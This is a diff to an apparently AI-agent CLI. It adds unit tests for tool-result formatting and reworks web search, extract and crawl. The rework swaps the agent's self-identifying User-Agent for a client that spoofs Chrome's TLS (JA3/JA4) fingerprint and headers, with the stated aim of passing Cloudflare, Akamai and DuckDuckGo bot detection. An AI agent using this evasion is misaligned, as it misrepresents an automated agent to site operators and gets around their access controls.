+    fn test_format_tool_result_terminal_failure() {
+        let result = "[terminal_result status=error backend=local cwd=/proj exit_code=1]\nerror: linker not found\n";
+        let out = format_tool_result("terminal", result, 80);
+        assert!(out.contains("✗ 1"), "should show ✗ exit 1, got: {out}");
+        assert!(out.contains("linker"), "should show error line, got: {out}");
+    }
+
+    #[test]
+    fn test_format_tool_result_terminal_no_output() {
+        // Only the header, no stdout — show exit code only.
+        let result = "[terminal_result status=success backend=local cwd=/tmp exit_code=0]";
+        let out = format_tool_result("terminal", result, 80);
+        assert!(out.contains("✓ 0"), "should show ✓ exit 0, got: {out}");
+    }
+
+    #[test]
+    fn test_parse_header_attr_exit_code() {
+        let header = "[terminal_result status=success backend=local cwd=/tmp exit_code=42]";
+        assert_eq!(parse_header_attr(header, "exit_code"), Some("42"));
+        assert_eq!(parse_header_attr(header, "status"), Some("success"));
+        assert_eq!(parse_header_attr(header, "missing"), None);
+    }
+
+    #[test]
+    fn test_format_tool_result_execute_code_success() {
+        let result = r#"{"status":"success","output":"Hello world\n","tool_calls_made":0,"duration_seconds":0.12}"#;
+        let out = format_tool_result("execute_code", result, 80);
+        assert!(out.contains("✓"), "should have success badge, got: {out}");
+        assert!(
+            out.contains("Hello world"),
+            "should show output, got: {out}"
+        );
+    }
+
+    #[test]
+    fn test_format_tool_result_execute_code_error() {
+        let result = r#"{"status":"error","error":"NameError: name 'x' not defined","output":""}"#;
+        let out = format_tool_result("execute_code", result, 80);
+        assert!(out.contains("✗"), "should have failure badge, got: {out}");
+        assert!(out.contains("NameError"), "should show error, got: {out}");
+    }
+
+    #[test]
+    fn test_format_tool_result_web_search_with_results() {
+        let result = r#"{"success":true,"query":"rust async","backend":"brave","results":[{"title":"Async in Rust","url":"https://example.com"},{"title":"Tokio guide","url":"https://tokio.rs"}]}"#;
+        let out = format_tool_result("web_search", result, 80);
+        assert!(out.contains("2 results"), "should show count, got: {out}");
+        assert!(
+            out.contains("Async in Rust"),
+            "should show first title, got: {out}"
+        );
+    }
+
+    #[test]
+    fn test_format_tool_result_web_search_no_results() {
+        let result = r#"{"success":true,"query":"xyz404","backend":"brave","results":[]}"#;
+        let out = format_tool_result("web_search", result, 80);
+        assert_eq!(out, "no results");
+    }
+
+    #[test]
+    fn test_format_tool_result_web_extract() {
+        let result = r#"{"success":true,"backend":"native","result":{"title":"Rust Programming Language","content":"The Rust programming language is blazingly fast..."}}"#;
+        let out = format_tool_result("web_extract", result, 80);
+        assert!(out.contains("chars"), "should show char count, got: {out}");
+        assert!(
+            out.contains("Rust Programming Language"),
+            "should show title, got: {out}"
+        );
+    }
+
+    #[test]
+    fn test_format_tool_result_web_crawl() {
+        let result = r#"{"success":true,"pages":[{"url":"https://a.com"},{"url":"https://b.com"},{"url":"https://c.com"}]}"#;
+        let out = format_tool_result("web_crawl", result, 80);
+        assert!(
+            out.contains("3 pages"),
+            "should show page count, got: {out}"
+        );
+    }
+
+    #[test]
+    fn test_format_tool_result_read_file_counts_lines() {
+        let content = "fn main() {\n    println!(\"hello\");\n}\n";
+        let out = format_tool_result("read_file", content, 80);
+        assert!(out.contains("3 lines"), "should show 3 lines, got: {out}");
+        assert!(
+            out.contains("fn main"),
+            "should show first code line, got: {out}"
+        );
+    }
+
+    #[test]
+    fn test_format_tool_result_read_file_single_line() {
+        let out = format_tool_result("read_file", "hello world", 80);
+        assert!(out.contains("1 line"), "should say 1 line, got: {out}");
+    }
+
+    #[test]
+    fn test_format_tool_result_search_files_counts_matches() {
+        let result = "src/main.rs:5:fn main() {\nsrc/lib.rs:12:pub fn foo() {\n";
+        let out = format_tool_result("search_files", result, 80);
+        assert!(
+            out.contains("2 matches"),
+            "should show 2 matches, got: {out}"
+        );
+    }
+
+    #[test]
+    fn test_format_tool_result_search_files_no_matches() {
+        let out = format_tool_result("search_files", "   ", 80);
+        // empty result → empty string (not "0 matches")
+        assert!(out.is_empty() || out.contains("no matches"), "got: {out}");
+    }
+
+    #[test]
+    fn test_format_tool_result_write_file_extracts_size() {
+        let out = format_tool_result("write_file", "Wrote 1234 bytes to 'src/main.rs'", 80);
+        assert!(out.contains("✓"), "should have success badge, got: {out}");
+        assert!(out.contains("1234 bytes"), "should show size, got: {out}");
+    }
+
+    #[test]
+    fn test_format_tool_result_apply_patch_counts_files() {
+        let result =
+            "apply_patch succeeded. Modified: src/main.rs, src/lib.rs; Created: src/new.rs";
+        let out = format_tool_result("apply_patch", result, 80);
+        assert!(out.contains("✓"), "should have success badge, got: {out}");
+        assert!(out.contains("3 files"), "should show 3 files, got: {out}");
+    }
+
+    #[test]
+    fn test_format_tool_result_apply_patch_single_file() {
+        let result = "apply_patch succeeded. Modified: src/main.rs";
+        let out = format_tool_result("apply_patch", result, 80);
+        assert!(out.contains("✓ 1 file"), "should show 1 file, got: {out}");
+    }
+
+    #[test]
+    fn test_format_tool_result_session_search() {
+        let result = r#"{"success":true,"results":[{"session_id":"abc"},{"session_id":"def"}]}"#;
+        let out = format_tool_result("session_search", result, 80);
+        assert!(
+            out.contains("2 results"),
+            "should show 2 results, got: {out}"
+        );
+    }
+
+    #[test]
+    fn test_format_tool_result_ha_call_service_success() {
+        let result = r#"{"success":true,"state":"on"}"#;
+        let out = format_tool_result("ha_call_service", result, 80);
+        assert!(out.contains("✓"), "should have success badge, got: {out}");
+    }
+
+    #[test]
+    fn test_format_tool_result_ha_call_service_failure() {
+        let result = r#"{"success":false,"error":"entity not found"}"#;
+        let out = format_tool_result("ha_call_service", result, 80);
+        assert!(out.contains("✗"), "should have failure badge, got: {out}");
+        assert!(
+            out.contains("entity not found"),
+            "should show error, got: {out}"
+        );
+    }
+
+    #[test]
+    fn test_format_tool_result_memory_saved() {
+        let out = format_tool_result("memory", "Added to user memory file.", 80);
+        assert_eq!(out, "✓ saved");
+    }
+
+    #[test]
+    fn test_format_tool_result_todo_plan_updated() {
+        let out = format_tool_result("todo", "TodoList updated.", 80);
+        assert_eq!(out, "✓ plan updated");
+        let out2 = format_tool_result("manage_todo_list", "ok", 80);
+        assert_eq!(out2, "✓ plan updated");
+    }
+
+    #[test]
+    fn test_format_tool_result_unknown_tool_falls_back() {
+        // Unknown tool: should return first meaningful line, not empty.
+        let out = format_tool_result("my_custom_tool", "result: all clear", 80);
+        assert!(
+            !out.is_empty(),
+            "unknown tool should produce non-empty output"
+        );
+        assert!(
+            out.contains("result: all clear"),
+            "should show first line, got: {out}"
+        );
+    }
+
+    #[test]
+    fn test_format_tool_result_respects_max_cols() {
+        // Very narrow budget — must never exceed.
+        let result = "[terminal_result status=success backend=local cwd=/longpath exit_code=0]\nsome quite long output line here";
+        let out = format_tool_result("terminal", result, 15);
+        assert!(
+            out.width() <= 15,
+            "result should fit in 15 cols, got {} cols: '{out}'",
+            out.width()
+        );
+    }
+
+    #[test]
+    fn test_format_tool_result_done_line_uses_rich_format() {
+        // Verify the done-line plumbing uses format_tool_result (not raw truncation).
+        let spans = build_tool_done_line_width(
+            "terminal",
+            r#"{"command":"cargo build"}"#,
+            Some(
+                "[terminal_result status=success backend=local cwd=/proj exit_code=0]\nFinished release target",
+            ),
+            500,
+            false,
+            &std::collections::HashMap::new(),
+            &DisplayWidths::DEFAULT,
+        );
+        let text: String = spans.iter().map(|s| s.content.as_ref()).collect();
+        assert!(
+            text.contains("✓ 0"),
+            "done-line should use rich terminal format, got: {text}"
+        );
+        assert!(
+            text.contains("Finished release"),
+            "done-line should show first output line, got: {text}"
+        );
+    }
+
+    #[test]
+    fn test_format_tool_result_verbose_line_uses_rich_format() {
+        // Verify verbose lines also use format_tool_result.
+        let lines = build_tool_verbose_lines_width(
+            "write_file",
+            r#"{"path":"src/main.rs","content":"fn main() {}"}"#,
+            Some("Wrote 12 bytes to 'src/main.rs'"),
+            false,
+            DisplayWidths::DEFAULT.verbose_content,
+        );
+        let all_text: String = lines
+            .iter()
+            .flat_map(|line| line.iter().map(|span| span.content.as_ref()))
+            .collect();
+        assert!(
+            all_text.contains("✓ 12 bytes"),
+            "verbose result should show rich write_file format, got: {all_text}"
+        );
     }
 }

--- a/crates/edgecrab-cli/src/tool_display.rs
+++ b/crates/edgecrab-cli/src/tool_display.rs
@@ -1743,9 +1743,7 @@ fn parse_header_attr<'a>(header: &'a str, key: &str) -> Option<&'a str> {
     let needle = format!("{key}=");
     let start = header.find(needle.as_str())? + needle.len();
     let rest = &header[start..];
-    let end = rest
-        .find(|c: char| c == ' ' || c == ']')
-        .unwrap_or(rest.len());
+    let end = rest.find([' ', ']']).unwrap_or(rest.len());
     Some(&rest[..end]).filter(|v| !v.is_empty())
 }
 
@@ -2350,7 +2348,10 @@ mod tests {
             .map(|span| span.content.as_ref())
             .collect::<String>();
         // The result column now shows the rich format (✓ N bytes) rather than raw text.
-        assert!(joined.contains("src/main.rs"), "should contain path in args preview");
+        assert!(
+            joined.contains("src/main.rs"),
+            "should contain path in args preview"
+        );
         assert!(
             joined.contains("✓ 42 bytes"),
             "result should use rich write_file format, got: {joined}"

--- a/crates/edgecrab-tools/Cargo.toml
+++ b/crates/edgecrab-tools/Cargo.toml
@@ -26,6 +26,7 @@ shellexpand = { workspace = true }
 dashmap = { workspace = true }
 regex = { workspace = true }
 reqwest = { workspace = true }
+wreq = { workspace = true }
 tokio-tungstenite = { workspace = true }
 futures = { workspace = true }
 strip-ansi-escapes = { workspace = true }

--- a/crates/edgecrab-tools/src/tools/web.rs
+++ b/crates/edgecrab-tools/src/tools/web.rs
@@ -20,15 +20,15 @@
 //!       ├── BRAVE_API_KEY set?
 //!       │       └──→ api.search.brave.com (good results, free tier)
 //!       │
-//!       └── fallback: DuckDuckGo Instant Answer API (no key, limited coverage)
-//!                 └──→ AbstractText + RelatedTopics → ranked results
+//!       └── fallback: DuckDuckGo HTML endpoint (no key; Chrome TLS emulation via wreq)
+//!                 └──→ POST html.duckduckgo.com/html/ with BoringSSL JA3/JA4 spoofing
 //! ```
 //!
 //! ## web_extract
 //!
 //! ```text
 //!   web_extract("https://doc.rust-lang.org/...")
-//!       └──→ reqwest::get → readable HTML extraction OR EdgeParse PDF extraction
+//!       └──→ wreq Chrome-emulating client → readable HTML or EdgeParse PDF extraction
 //! ```
 //!
 //! SSRF prevention is applied before any outbound request via
@@ -70,6 +70,9 @@ static ARTICLE_RE: OnceLock<Regex> = OnceLock::new();
 static BODY_RE: OnceLock<Regex> = OnceLock::new();
 static NOISE_BLOCK_RE: OnceLock<Regex> = OnceLock::new();
 static BLOCK_BREAK_RE: OnceLock<Regex> = OnceLock::new();
+/// Compiled regexes for DuckDuckGo HTML result parsing.
+static DDG_RESULT_RE: OnceLock<Regex> = OnceLock::new();
+static DDG_SNIPPET_RE: OnceLock<Regex> = OnceLock::new();
 
 fn html_tag_re() -> &'static Regex {
     HTML_TAG_RE.get_or_init(|| Regex::new(r"<[^>]+>").expect("valid regex"))
@@ -679,27 +682,6 @@ struct SearchArgs {
     backend: Option<String>,
 }
 
-/// Top-level DuckDuckGo Instant Answer API response.
-#[derive(Deserialize)]
-#[allow(non_snake_case)]
-struct DdgResponse {
-    AbstractText: Option<String>,
-    AbstractURL: Option<String>,
-    RelatedTopics: Vec<DdgTopic>,
-}
-
-/// A related topic from the DDG response.
-#[derive(Deserialize)]
-struct DdgTopic {
-    #[serde(rename = "Text")]
-    text: Option<String>,
-    #[serde(rename = "FirstURL")]
-    first_url: Option<String>,
-    /// Nested sub-topics group (ignored for now)
-    #[serde(rename = "Topics")]
-    _topics: Option<Vec<serde_json::Value>>,
-}
-
 /// A single normalized search result.
 #[derive(Serialize)]
 struct SearchResult {
@@ -967,68 +949,87 @@ async fn search_brave(query: &str, max: usize) -> Result<Vec<SearchResult>, Tool
     Ok(results)
 }
 
-/// Search via DuckDuckGo Instant Answer API (no key required).
+/// Search via DuckDuckGo HTML endpoint using Chrome TLS/HTTP-2 fingerprint emulation.
 ///
-/// NOTE: This API only returns results for well-known entities and topics.
-/// It does NOT provide full web search results. For general queries, set
-/// TAVILY_API_KEY or BRAVE_API_KEY for proper search results.
+/// Endpoint: https://html.duckduckgo.com/html/ (POST form, not the Instant Answer API)
 async fn search_duckduckgo(query: &str, max: usize) -> Result<Vec<SearchResult>, ToolError> {
-    let url = format!(
-        "https://api.duckduckgo.com/?q={}&format=json&no_html=1&skip_disambig=1",
-        urlencoding_encode(query)
-    );
+    validate_url("https://html.duckduckgo.com/", "web_search")?;
 
-    validate_url(&url, "web_search")?;
+    let client = build_chrome_client("web_search")?;
 
-    let client = build_client()?;
+    let form = [("q", query), ("b", ""), ("kl", "us-en")];
     let resp = client
-        .get(&url)
-        .header(
-            "User-Agent",
-            "EdgeCrab/0.1 (agent; +https://github.com/raphaelmansuy/edgecrab)",
-        )
+        .post("https://html.duckduckgo.com/html/")
+        .form(&form)
         .send()
         .await
         .map_err(|e| ToolError::ExecutionFailed {
             tool: "web_search".into(),
-            message: format!("HTTP error: {e}"),
+            message: format!("DDG HTTP error: {e}"),
         })?;
 
-    let ddg: DdgResponse =
-        resp.json::<DdgResponse>()
-            .await
-            .map_err(|e| ToolError::ExecutionFailed {
-                tool: "web_search".into(),
-                message: format!("JSON parse error: {e}"),
-            })?;
-
-    let mut results: Vec<SearchResult> = Vec::new();
-
-    // Add the abstract if present
-    if let (Some(text), Some(url)) = (&ddg.AbstractText, &ddg.AbstractURL) {
-        if !text.is_empty() {
-            results.push(SearchResult {
-                title: "Summary".into(),
-                url: url.clone(),
-                description: text.clone(),
-            });
-        }
+    if !resp.status().is_success() {
+        let status = resp.status();
+        return Err(ToolError::ExecutionFailed {
+            tool: "web_search".into(),
+            message: format!(
+                "DDG returned HTTP {status}. \
+                 Set TAVILY_API_KEY or BRAVE_API_KEY for reliable search."
+            ),
+        });
     }
 
-    // Add related topics
-    for topic in ddg.RelatedTopics.iter().take(max) {
-        if let (Some(text), Some(url)) = (&topic.text, &topic.first_url) {
-            if !text.is_empty() {
-                results.push(SearchResult {
-                    title: text.split(" - ").next().unwrap_or(text).to_string(),
-                    url: url.clone(),
-                    description: text.clone(),
-                });
-            }
-        }
+    let html = resp.text().await.map_err(|e| ToolError::ExecutionFailed {
+        tool: "web_search".into(),
+        message: format!("DDG read error: {e}"),
+    })?;
+
+    if html.contains("anomaly-modal") || html.len() < 500 {
+        return Err(ToolError::ExecutionFailed {
+            tool: "web_search".into(),
+            message: "DDG returned a bot-challenge page. \
+                      Set TAVILY_API_KEY or BRAVE_API_KEY for reliable search."
+                .into(),
+        });
     }
 
-    Ok(results)
+    parse_ddg_html_results(&html, max)
+}
+
+/// Parse web results from an `html.duckduckgo.com` HTML response.
+///
+/// Captures `<a class="result__a">` for title+URL and
+/// `<a class="result__snippet">` for description snippets.
+fn parse_ddg_html_results(html: &str, max: usize) -> Result<Vec<SearchResult>, ToolError> {
+    let result_re = DDG_RESULT_RE.get_or_init(|| {
+        Regex::new(r#"class="result__a"[^>]*href="([^"]+)"[^>]*>([^<]+)"#)
+            .expect("valid DDG result regex")
+    });
+    let snippet_re = DDG_SNIPPET_RE.get_or_init(|| {
+        Regex::new(r#"class="result__snippet"[^>]*>([\s\S]*?)</a>"#)
+            .expect("valid DDG snippet regex")
+    });
+
+    let pairs: Vec<(String, String)> = result_re
+        .captures_iter(html)
+        .map(|c| (c[1].to_string(), c[2].trim().to_string()))
+        .collect();
+
+    let snippets: Vec<String> = snippet_re
+        .captures_iter(html)
+        .map(|c| strip_html(&c[1]).trim().to_string())
+        .collect();
+
+    Ok(pairs
+        .into_iter()
+        .take(max)
+        .enumerate()
+        .map(|(i, (url, title))| SearchResult {
+            title,
+            url,
+            description: snippets.get(i).cloned().unwrap_or_default(),
+        })
+        .collect())
 }
 
 fn normalize_firecrawl_document(
@@ -1397,8 +1398,8 @@ impl ToolHandler for WebSearchTool {
                           For best results: set FIRECRAWL_API_KEY (https://firecrawl.dev), \
                           TAVILY_API_KEY (https://app.tavily.com, free tier) \
                           or BRAVE_API_KEY (https://api.search.brave.com/app/keys, free tier). \
-                          Without an API key, falls back to DuckDuckGo Instant Answers which only \
-                          covers well-known topics."
+                          Without an API key, falls back to DuckDuckGo HTML search \
+                          (Chrome TLS fingerprint via wreq; results may vary)."
                 .into(),
             parameters: json!({
                 "type": "object",
@@ -1450,7 +1451,7 @@ impl ToolHandler for WebSearchTool {
                 (
                     "DuckDuckGo",
                     Some(
-                        "DuckDuckGo Instant Answers is the no-key fallback and only covers well-known topics. Set TAVILY_API_KEY or BRAVE_API_KEY in ~/.edgecrab/.env for broader search."
+                        "DuckDuckGo HTML is the no-key fallback (Chrome TLS emulation). For reliable broad search set TAVILY_API_KEY or BRAVE_API_KEY in ~/.edgecrab/.env."
                             .to_string(),
                     ),
                     results,
@@ -1552,13 +1553,9 @@ async fn extract_document_for_url(
                 .map(|page| page.document)
         }
         ContentBackend::Native => {
-            let client = build_client()?;
+            let client = build_chrome_client("web_extract")?;
             let resp = client
                 .get(requested_url.as_str())
-                .header(
-                    "User-Agent",
-                    "EdgeCrab/0.1 (agent; +https://github.com/raphaelmansuy/edgecrab)",
-                )
                 .send()
                 .await
                 .map_err(|e| ToolError::ExecutionFailed {
@@ -1900,7 +1897,7 @@ impl ToolHandler for WebCrawlTool {
         }
 
         let client = match backend {
-            ContentBackend::Native => Some(build_client()?),
+            ContentBackend::Native => Some(build_chrome_client("web_crawl")?),
             ContentBackend::Browser | ContentBackend::Firecrawl | ContentBackend::Tavily => None,
         };
         let mut queue = VecDeque::from([(start_url.clone(), 0usize)]);
@@ -1930,11 +1927,7 @@ impl ToolHandler for WebCrawlTool {
                     let response = client
                         .as_ref()
                         .expect("native client")
-                        .get(current_url.clone())
-                        .header(
-                            "User-Agent",
-                            "EdgeCrab/0.1 (agent; +https://github.com/raphaelmansuy/edgecrab)",
-                        )
+                        .get(current_url.as_str())
                         .send()
                         .await
                         .map_err(|e| ToolError::ExecutionFailed {
@@ -1952,7 +1945,7 @@ impl ToolHandler for WebCrawlTool {
 
                     let content_type = response
                         .headers()
-                        .get(reqwest::header::CONTENT_TYPE)
+                        .get(wreq::header::CONTENT_TYPE)
                         .and_then(|value| value.to_str().ok())
                         .unwrap_or("")
                         .to_string();
@@ -2073,10 +2066,92 @@ fn validate_url(url: &str, tool: &str) -> Result<(), ToolError> {
     }
 }
 
-/// Build a shared reqwest client with a sensible timeout.
+/// Build a browser-emulating HTTP client with Chrome TLS/HTTP-2 fingerprints (wreq).
+///
+/// WHY Chrome fingerprint for arbitrary HTML:
+///   CDN bot-detection (Cloudflare, Akamai, DuckDuckGo) matches the JA3/JA4 TLS
+///   fingerprint of the connecting client. A plain `reqwest` client is trivially
+///   identified as non-browser and blocked. wreq with BoringSSL + GREASE passes
+///   these checks. Use this for any fetch from an untrusted/arbitrary URL.
+///
+/// WHY inline TLS config (not wreq-util):
+///   wreq-util is GPL-3.0 — incompatible with this project's Apache-2.0 licence.
+///   Chrome TLS settings (cipher list, sigalgs, curves) are hardcoded inline.
+fn build_chrome_client(tool: &str) -> Result<wreq::Client, ToolError> {
+    use wreq::{
+        EmulationProvider, SslCurve,
+        header::{ACCEPT, ACCEPT_LANGUAGE, HeaderMap, HeaderValue, USER_AGENT},
+        tls::{AlpnProtos, TlsConfig, TlsVersion},
+    };
+
+    let tls = TlsConfig::builder()
+        .min_tls_version(TlsVersion::TLS_1_2)
+        .max_tls_version(TlsVersion::TLS_1_3)
+        .cipher_list(concat!(
+            "TLS_AES_128_GCM_SHA256:TLS_AES_256_GCM_SHA384:TLS_CHACHA20_POLY1305_SHA256:",
+            "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256:TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256:",
+            "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384:TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384:",
+            "TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256:",
+            "TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256:",
+            "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA:TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA:",
+            "TLS_RSA_WITH_AES_128_GCM_SHA256:TLS_RSA_WITH_AES_256_GCM_SHA384:",
+            "TLS_RSA_WITH_AES_128_CBC_SHA:TLS_RSA_WITH_AES_256_CBC_SHA"
+        ))
+        .sigalgs_list(concat!(
+            "ecdsa_secp256r1_sha256:rsa_pss_rsae_sha256:rsa_pkcs1_sha256:",
+            "ecdsa_secp384r1_sha384:rsa_pss_rsae_sha384:rsa_pkcs1_sha384:",
+            "rsa_pss_rsae_sha512:rsa_pkcs1_sha512"
+        ))
+        .curves(vec![
+            SslCurve::X25519,
+            SslCurve::SECP256R1,
+            SslCurve::SECP384R1,
+        ])
+        .alpn_protos(AlpnProtos::ALL)
+        .grease_enabled(true)
+        .permute_extensions(true)
+        .enable_ech_grease(true)
+        .pre_shared_key(true)
+        .enable_ocsp_stapling(true)
+        .build();
+
+    let mut headers = HeaderMap::new();
+    headers.insert(
+        USER_AGENT,
+        HeaderValue::from_static(
+            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) \
+             AppleWebKit/537.36 (KHTML, like Gecko) \
+             Chrome/136.0.0.0 Safari/537.36",
+        ),
+    );
+    headers.insert(
+        ACCEPT,
+        HeaderValue::from_static("text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
+    );
+    headers.insert(ACCEPT_LANGUAGE, HeaderValue::from_static("en-US,en;q=0.9"));
+
+    let provider = EmulationProvider::builder()
+        .tls_config(tls)
+        .default_headers(headers)
+        .build();
+
+    wreq::Client::builder()
+        .emulation(provider)
+        .timeout(std::time::Duration::from_secs(15))
+        .build()
+        .map_err(|e| ToolError::ExecutionFailed {
+            tool: tool.into(),
+            message: format!("Failed to build Chrome-emulating client: {e}"),
+        })
+}
+
+/// Build a plain reqwest client for trusted JSON API backends (Firecrawl, Tavily, Brave).
+///
+/// WHY reqwest (not wreq) here:
+///   These are first-party JSON APIs with Bearer token auth — no bot-detection.
+///   reqwest is lighter and avoids spawning a BoringSSL TLS stack unnecessarily.
 ///
 /// WHY 15-second timeout: Balances responsiveness vs. slow websites.
-/// This timeout balances responsiveness against slow websites.
 fn build_client() -> Result<reqwest::Client, ToolError> {
     reqwest::Client::builder()
         .timeout(std::time::Duration::from_secs(15))

--- a/crates/edgecrab-tools/src/tools/web.rs
+++ b/crates/edgecrab-tools/src/tools/web.rs
@@ -374,6 +374,48 @@ fn resolve_search_backend(preferred: Option<&str>) -> Result<SearchBackend, Tool
     }
 }
 
+fn search_backend_name(backend: &SearchBackend) -> &'static str {
+    match backend {
+        SearchBackend::Firecrawl => "firecrawl",
+        SearchBackend::Tavily => "tavily",
+        SearchBackend::Brave => "brave",
+        SearchBackend::DuckDuckGo => "duckduckgo",
+    }
+}
+
+/// Returns an ordered chain of search backends to try in "auto" mode.
+///
+/// Priority: Firecrawl (highest quality) → Brave → Tavily → DuckDuckGo
+/// (guaranteed no-key fallback).
+/// Explicit overrides produce a single-element chain: the caller asked for a
+/// specific backend and we honour that intent without silent fallback.
+fn resolve_search_backend_chain(preferred: Option<&str>) -> Result<Vec<SearchBackend>, ToolError> {
+    let choice = preferred
+        .map(|value| value.trim().to_ascii_lowercase())
+        .filter(|value| !value.is_empty())
+        .or_else(|| backend_override(&["EDGECRAB_WEB_SEARCH_BACKEND", "EDGECRAB_WEB_BACKEND"]));
+
+    match choice.as_deref().unwrap_or("auto") {
+        "auto" => {
+            let mut chain: Vec<SearchBackend> = Vec::with_capacity(4);
+            if has_firecrawl_api_key() {
+                chain.push(SearchBackend::Firecrawl);
+            }
+            if has_brave_api_key() {
+                chain.push(SearchBackend::Brave);
+            }
+            if has_tavily_api_key() {
+                chain.push(SearchBackend::Tavily);
+            }
+            // DuckDuckGo always available — guaranteed terminal fallback.
+            chain.push(SearchBackend::DuckDuckGo);
+            Ok(chain)
+        }
+        // Explicit override — single element, no silent fallback.
+        other => resolve_search_backend(Some(other)).map(|b| vec![b]),
+    }
+}
+
 fn resolve_content_backend(
     preferred: Option<&str>,
     tool: &str,
@@ -815,7 +857,7 @@ struct SearchResult {
 /// Search via Tavily API (api_key from TAVILY_API_KEY env).
 ///
 /// Tavily free tier: ~1000 searches/month. Get key at https://app.tavily.com
-async fn search_tavily(query: &str, max: usize) -> Result<Vec<SearchResult>, ToolError> {
+async fn search_tavily(query: &str, max: usize) -> Result<Vec<SearchResult>, BackendError> {
     let data = tavily_request(
         "search",
         json!({
@@ -826,8 +868,7 @@ async fn search_tavily(query: &str, max: usize) -> Result<Vec<SearchResult>, Too
         }),
         "web_search",
     )
-    .await
-    .map_err(BackendError::into_tool_error)?;
+    .await?;
 
     let results = data["results"]
         .as_array()
@@ -947,7 +988,7 @@ fn normalize_firecrawl_search_results(data: &serde_json::Value, max: usize) -> V
         .collect()
 }
 
-async fn search_firecrawl(query: &str, max: usize) -> Result<Vec<SearchResult>, ToolError> {
+async fn search_firecrawl(query: &str, max: usize) -> Result<Vec<SearchResult>, BackendError> {
     let data = firecrawl_request(
         reqwest::Method::POST,
         "search",
@@ -958,8 +999,7 @@ async fn search_firecrawl(query: &str, max: usize) -> Result<Vec<SearchResult>, 
         })),
         "web_search",
     )
-    .await
-    .map_err(BackendError::into_tool_error)?;
+    .await?;
     Ok(normalize_firecrawl_search_results(&data, max))
 }
 
@@ -1013,9 +1053,9 @@ async fn tavily_request(
 /// Search via Brave Search API (api_key from BRAVE_API_KEY env).
 ///
 /// Brave free tier: 2000 searches/month. Get key at https://api.search.brave.com/app/keys
-async fn search_brave(query: &str, max: usize) -> Result<Vec<SearchResult>, ToolError> {
+async fn search_brave(query: &str, max: usize) -> Result<Vec<SearchResult>, BackendError> {
     let api_key = std::env::var("BRAVE_API_KEY").unwrap_or_default();
-    let client = build_client()?;
+    let client = build_client().map_err(|e| BackendError::hard("web_search", e.to_string()))?;
 
     let url = format!(
         "https://api.search.brave.com/res/v1/web/search?q={}&count={}",
@@ -1029,23 +1069,20 @@ async fn search_brave(query: &str, max: usize) -> Result<Vec<SearchResult>, Tool
         .header("Accept", "application/json")
         .send()
         .await
-        .map_err(|e| ToolError::ExecutionFailed {
-            tool: "web_search".into(),
-            message: format!("Brave Search API error: {e}"),
-        })?;
+        .map_err(|e| BackendError::network("web_search", format!("Brave Search API error: {e}")))?;
 
     if !resp.status().is_success() {
-        let status = resp.status();
+        let code = resp.status().as_u16();
         let text = resp.text().await.unwrap_or_default();
-        return Err(ToolError::ExecutionFailed {
-            tool: "web_search".into(),
-            message: format!("Brave Search HTTP {status}: {text}"),
-        });
+        return Err(BackendError::api(
+            code,
+            "web_search",
+            format!("Brave Search HTTP {code}: {text}"),
+        ));
     }
 
-    let data: serde_json::Value = resp.json().await.map_err(|e| ToolError::ExecutionFailed {
-        tool: "web_search".into(),
-        message: format!("Brave Search JSON parse error: {e}"),
+    let data: serde_json::Value = resp.json().await.map_err(|e| {
+        BackendError::hard("web_search", format!("Brave Search JSON parse error: {e}"))
     })?;
 
     let results = data["web"]["results"]
@@ -1072,10 +1109,12 @@ async fn search_brave(query: &str, max: usize) -> Result<Vec<SearchResult>, Tool
 /// Search via DuckDuckGo HTML endpoint using Chrome TLS/HTTP-2 fingerprint emulation.
 ///
 /// Endpoint: https://html.duckduckgo.com/html/ (POST form, not the Instant Answer API)
-async fn search_duckduckgo(query: &str, max: usize) -> Result<Vec<SearchResult>, ToolError> {
-    validate_url("https://html.duckduckgo.com/", "web_search")?;
+async fn search_duckduckgo(query: &str, max: usize) -> Result<Vec<SearchResult>, BackendError> {
+    validate_url("https://html.duckduckgo.com/", "web_search")
+        .map_err(|e| BackendError::hard("web_search", e.to_string()))?;
 
-    let client = build_chrome_client("web_search")?;
+    let client = build_chrome_client("web_search")
+        .map_err(|e| BackendError::hard("web_search", e.to_string()))?;
 
     let form = [("q", query), ("b", ""), ("kl", "us-en")];
     let resp = client
@@ -1083,37 +1122,33 @@ async fn search_duckduckgo(query: &str, max: usize) -> Result<Vec<SearchResult>,
         .form(&form)
         .send()
         .await
-        .map_err(|e| ToolError::ExecutionFailed {
-            tool: "web_search".into(),
-            message: format!("DDG HTTP error: {e}"),
-        })?;
+        .map_err(|e| BackendError::network("web_search", format!("DDG HTTP error: {e}")))?;
 
     if !resp.status().is_success() {
-        let status = resp.status();
-        return Err(ToolError::ExecutionFailed {
-            tool: "web_search".into(),
-            message: format!(
-                "DDG returned HTTP {status}. \
-                 Set TAVILY_API_KEY or BRAVE_API_KEY for reliable search."
-            ),
-        });
+        let code = resp.status().as_u16();
+        return Err(BackendError::api(
+            code,
+            "web_search",
+            format!("DDG returned HTTP {code}."),
+        ));
     }
 
-    let html = resp.text().await.map_err(|e| ToolError::ExecutionFailed {
-        tool: "web_search".into(),
-        message: format!("DDG read error: {e}"),
-    })?;
+    let html = resp
+        .text()
+        .await
+        .map_err(|e| BackendError::network("web_search", format!("DDG read error: {e}")))?;
 
+    // DDG bot-challenge: treat as transient so callers can log a warning
+    // rather than hard-failing the whole search.
     if html.contains("anomaly-modal") || html.len() < 500 {
-        return Err(ToolError::ExecutionFailed {
-            tool: "web_search".into(),
-            message: "DDG returned a bot-challenge page. \
-                      Set TAVILY_API_KEY or BRAVE_API_KEY for reliable search."
-                .into(),
-        });
+        return Err(BackendError::api(
+            503,
+            "web_search",
+            "DDG returned a bot-challenge page.",
+        ));
     }
 
-    parse_ddg_html_results(&html, max)
+    parse_ddg_html_results(&html, max).map_err(|e| BackendError::hard("web_search", e.to_string()))
 }
 
 /// Parse web results from an `html.duckduckgo.com` HTML response.
@@ -1491,6 +1526,48 @@ async fn crawl_via_tavily(
     Ok(pages)
 }
 
